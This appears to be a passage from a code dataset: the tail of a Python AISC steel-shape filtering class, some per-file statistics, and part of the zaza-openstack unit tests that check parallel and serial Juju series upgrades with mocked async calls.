filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'PIPE':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def C(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'C':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def HSS_RND(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'HSS-RND':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def MC(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'MC':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def HSS_RECT(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'HSS-RECT':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def HP(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'HP':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def M(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'M':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def L(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'L':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def ST(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'ST':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def HSS_SQR(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'HSS-SQR':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def MT(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'MT':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def S(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'S':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def WT(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'WT':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def LL(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == '2L':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
db = aisc_15th_database()
defs = db.definitions
sections = db.shapes
labels = db.labels
| 39.533879
| 126
| 0.502792
| 3,415
| 33,841
| 4.835139
| 0.064422
| 0.029978
| 0.081759
| 0.059048
| 0.888748
| 0.880148
| 0.880148
| 0.880148
| 0.880148
| 0.880148
| 0
| 0.043573
| 0.389646
| 33,841
| 856
| 127
| 39.533879
| 0.755846
| 0.049378
| 0
| 0.895801
| 0
| 0
| 0.005974
| 0.003322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024883
| false
| 0.07154
| 0
| 0
| 0.049767
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0231dbf51a39d74c1028cd861a36f4ebd1c238e8
| 23,907
|
py
|
Python
|
unit_tests/utilities/test_zaza_utilities_parallel_series_upgrade.py
|
fnordahl/zaza-openstack-tests
|
bf4f41213592448a105eb37dc9fa523a89c309a1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/utilities/test_zaza_utilities_parallel_series_upgrade.py
|
fnordahl/zaza-openstack-tests
|
bf4f41213592448a105eb37dc9fa523a89c309a1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/utilities/test_zaza_utilities_parallel_series_upgrade.py
|
fnordahl/zaza-openstack-tests
|
bf4f41213592448a105eb37dc9fa523a89c309a1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import mock
import sys
import unittest
import unit_tests.utils as ut_utils
import zaza.openstack.utilities.generic as generic_utils
import zaza.openstack.utilities.series_upgrade as series_upgrade
import zaza.openstack.utilities.parallel_series_upgrade as upgrade_utils
FAKE_STATUS = {
'can-upgrade-to': '',
'charm': 'local:trusty/app-136',
'subordinate-to': [],
'units': {'app/0': {'leader': True,
'machine': '0',
'subordinates': {
'app-hacluster/0': {
'charm': 'local:trusty/hacluster-0',
'leader': True}}},
'app/1': {'machine': '1',
'subordinates': {
'app-hacluster/1': {
'charm': 'local:trusty/hacluster-0'}}},
'app/2': {'machine': '2',
'subordinates': {
'app-hacluster/2': {
'charm': 'local:trusty/hacluster-0'}}}}}
FAKE_STATUS_MONGO = {
'can-upgrade-to': '',
'charm': 'local:trusty/mongodb-10',
'subordinate-to': [],
'units': {'mongo/0': {'leader': True,
'machine': '0',
'subordinates': {}},
'mongo/1': {'machine': '1',
'subordinates': {}},
'mongo/2': {'machine': '2',
'subordinates': {}}}}
class Test_ParallelSeriesUpgradeSync(ut_utils.BaseTestCase):
def setUp(self):
super(Test_ParallelSeriesUpgradeSync, self).setUp()
# Juju Status Object and data
# self.juju_status = mock.MagicMock()
# self.juju_status.applications.__getitem__.return_value = FAKE_STATUS
# self.patch_object(upgrade_utils, "model")
# self.model.get_status.return_value = self.juju_status
def test_get_leader_and_non_leaders(self):
expected = ({
'app/0': {
'leader': True,
'machine': '0',
'subordinates': {
'app-hacluster/0': {
'charm': 'local:trusty/hacluster-0',
'leader': True}}}}, {
'app/1': {
'machine': '1',
'subordinates': {
'app-hacluster/1': {
'charm': 'local:trusty/hacluster-0'}}},
'app/2': {
'machine': '2',
'subordinates': {
'app-hacluster/2': {
'charm': 'local:trusty/hacluster-0'}}}})
self.assertEqual(
expected,
upgrade_utils.get_leader_and_non_leaders(FAKE_STATUS)
)
def test_app_config_openstack_charm(self):
expected = {
'origin': 'openstack-origin',
'pause_non_leader_subordinate': True,
'pause_non_leader_primary': True,
'post_upgrade_functions': [],
'pre_upgrade_functions': [],
'post_application_upgrade_functions': [],
'follower_first': False, }
config = upgrade_utils.app_config('keystone')
self.assertEqual(expected, config)
def test_app_config_mongo(self):
expected = {
'origin': None,
'pause_non_leader_subordinate': True,
'pause_non_leader_primary': True,
'post_upgrade_functions': [],
'pre_upgrade_functions': [],
'post_application_upgrade_functions': [],
'follower_first': True, }
config = upgrade_utils.app_config('mongodb')
self.assertEqual(expected, config)
def test_app_config_ceph(self):
expected = {
'origin': 'source',
'pause_non_leader_subordinate': False,
'pause_non_leader_primary': False,
'post_upgrade_functions': [],
'pre_upgrade_functions': [],
'post_application_upgrade_functions': [],
'follower_first': False, }
config = upgrade_utils.app_config('ceph-mon')
self.assertEqual(expected, config)
def test_app_config_percona(self):
expected = {
'origin': 'source',
'pause_non_leader_subordinate': True,
'pause_non_leader_primary': True,
'post_upgrade_functions': [],
'pre_upgrade_functions': [],
'post_application_upgrade_functions': [
('zaza.openstack.charm_tests.mysql.utils.'
'complete_cluster_series_upgrade')
],
'follower_first': False, }
config = upgrade_utils.app_config('percona-cluster')
self.assertEqual(expected, config)
class AioTestCase(ut_utils.BaseTestCase):
def __init__(self, methodName='runTest', loop=None):
self.loop = loop or asyncio.get_event_loop()
self._function_cache = {}
super(AioTestCase, self).__init__(methodName=methodName)
def coroutine_function_decorator(self, func):
def wrapper(*args, **kw):
return self.loop.run_until_complete(func(*args, **kw))
return wrapper
def __getattribute__(self, item):
attr = object.__getattribute__(self, item)
if asyncio.iscoroutinefunction(attr) and item.startswith('test_'):
if item not in self._function_cache:
self._function_cache[item] = (
self.coroutine_function_decorator(attr))
return self._function_cache[item]
return attr
class TestParallelSeriesUpgrade(AioTestCase):
def setUp(self):
super(TestParallelSeriesUpgrade, self).setUp()
if sys.version_info < (3, 6, 0):
raise unittest.SkipTest("Can't AsyncMock in py35")
self.patch_object(series_upgrade, "async_prepare_series_upgrade")
self.patch_object(generic_utils, 'check_call')
# Juju Status Object and data
self.juju_status = mock.AsyncMock()
self.juju_status.return_value.applications.__getitem__.return_value = \
FAKE_STATUS
self.patch_object(upgrade_utils, "model")
self.model.async_get_status = self.juju_status
self.async_run_action = mock.AsyncMock()
self.model.async_run_action = self.async_run_action
self.async_block_until = mock.AsyncMock()
self.model.async_block_until = self.async_block_until
self.model.async_wait_for_unit_idle = mock.AsyncMock()
self.async_run_on_machine = mock.AsyncMock()
self.model.async_run_on_machine = self.async_run_on_machine
self.model.async_block_until_units_on_machine_are_idle = \
mock.AsyncMock()
@mock.patch.object(upgrade_utils.cl_utils, 'get_class')
async def test_run_post_application_upgrade_functions(
self,
mock_get_class
):
called = mock.AsyncMock()
mock_get_class.return_value = called
await upgrade_utils.run_post_application_upgrade_functions(
['my.thing'])
mock_get_class.assert_called_once_with('my.thing')
called.assert_called()
@mock.patch.object(upgrade_utils.cl_utils, 'get_class')
async def test_run_pre_upgrade_functions(self, mock_get_class):
called = mock.AsyncMock()
mock_get_class.return_value = called
await upgrade_utils.run_pre_upgrade_functions('1', ['my.thing'])
mock_get_class.assert_called_once_with('my.thing')
called.assert_called_once_with('1')
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_parallel_series_upgrade_mongo(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
self.juju_status.return_value.applications.__getitem__.return_value = \
FAKE_STATUS_MONGO
upgrade_config = upgrade_utils.app_config('mongodb')
await upgrade_utils.parallel_series_upgrade(
'mongodb',
from_series='trusty',
to_series='xenial',
**upgrade_config
)
mock_async_set_series.assert_called_once_with(
'mongodb', to_series='xenial')
self.juju_status.assert_called()
# The below is using `any_order=True` because the ordering is
# undetermined and differs between python versions
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
mock.call('0', to_series='xenial'),
], any_order=True)
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'1',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'2',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'0',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
])
mock_post_application_upgrade_functions.assert_called_once_with([])
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_serial_series_upgrade_mongo(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
self.juju_status.return_value.applications.__getitem__.return_value = \
FAKE_STATUS_MONGO
upgrade_config = upgrade_utils.app_config('mongodb')
await upgrade_utils.serial_series_upgrade(
'mongodb',
from_series='trusty',
to_series='xenial',
**upgrade_config
)
mock_async_set_series.assert_called_once_with(
'mongodb', to_series='xenial')
self.juju_status.assert_called()
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
mock.call('0', to_series='xenial'),
])
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'1',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'2',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'0',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
])
mock_post_application_upgrade_functions.assert_called_once_with([])
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_parallel_series_upgrade(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
await upgrade_utils.parallel_series_upgrade(
'app',
from_series='trusty',
to_series='xenial',
)
mock_async_set_series.assert_called_once_with(
'app', to_series='xenial')
self.juju_status.assert_called()
# The below is using `any_order=True` because the ordering is
# undetermined and differs between python versions
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
mock.call('0', to_series='xenial'),
], any_order=True)
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'1',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'2',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'0',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
])
mock_post_application_upgrade_functions.assert_called_once_with(None)
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_serial_series_upgrade(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
await upgrade_utils.serial_series_upgrade(
'app',
from_series='trusty',
to_series='xenial',
)
mock_async_set_series.assert_called_once_with(
'app', to_series='xenial')
self.juju_status.assert_called()
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('0', to_series='xenial'),
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
])
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'0',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'1',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'2',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
])
mock_post_application_upgrade_functions.assert_called_once_with(None)
@mock.patch.object(upgrade_utils, 'add_confdef_file')
